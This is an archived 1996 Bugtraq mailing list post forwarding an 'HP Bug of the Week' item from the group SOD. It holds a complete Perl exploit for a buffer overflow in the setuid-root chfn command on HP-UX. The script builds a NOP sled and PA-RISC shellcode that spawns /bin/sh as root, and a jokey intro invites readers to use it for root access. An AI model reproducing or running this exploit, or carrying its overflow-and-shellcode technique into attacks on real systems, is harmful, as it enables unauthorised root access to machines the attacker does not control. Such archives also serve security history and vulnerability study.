Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

the HP Bug of the Week!

From: aleph1 () dfw net (Aleph One)
Date: Mon, 9 Dec 1996 02:47:46 -0600


From our friends at SOD:


   This week: the continuing saga of buffer overflows in setuid root
   programs


   Amid the struggle of the terrible workaday week, among the lost
   broken-hearted keypunching drones, alongside the workers in the
   dreaded server farm, Our Hero bravely sends the legally forbidden
   datastream across the burning wires toward a cold and lifeless shell
   of a shell. The electrons twist! The binary bits battle! The data bus
   swerves sharply to avoid hitting the eclectic keywords! Was the script
   executed in time to save Our Hero and his lovely Mistress? Were the
   exploitable programs still enabled setuid root? Will the buffers spill
   onto the stack and leave way to run a small semblance of illicit code?
   Of course they will, and you don't have to tune in next week to find
   out, either. This week, the chfn command happily runs some code for us
   as root, and Otto Sync joins us as an honorary Scriptor with his
   exploits written especially for HP's OpenCall Service Control Point
   platform for SS7 telephony use -- oh, I don't know how well Alcatel is
   going to like this one! So snarf it, pop it open, and suck it down,
   and as always remember to start clicking your way to root access with
   scripts from those Superhero kind of folks at SOD.

     _________________________________________________________________

Caveat Emptor



   of.chfn changes uid's, too! script for this week
     _________________________________________________________________
#!/usr/bin/perl

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;

if ($rev eq "10") {
  $offset=2070;
  $prealign="AA";
  $postalign="PPPP";
  $pcoq=h2cs("7b03A013");
  } else {
  $offset=2070;
  $prealign="AA";
  $postalign="PPPP";
  $pcoq=h2cs("7b033013");
  }

$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg0,arg0,arg0
$code.=h2cs("0b180298"); # XOR arg0,arg0,arg0
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff

$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/usr/bin/chfn","$of");


Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
Previous By Date Next
Previous By Thread Next

Current thread: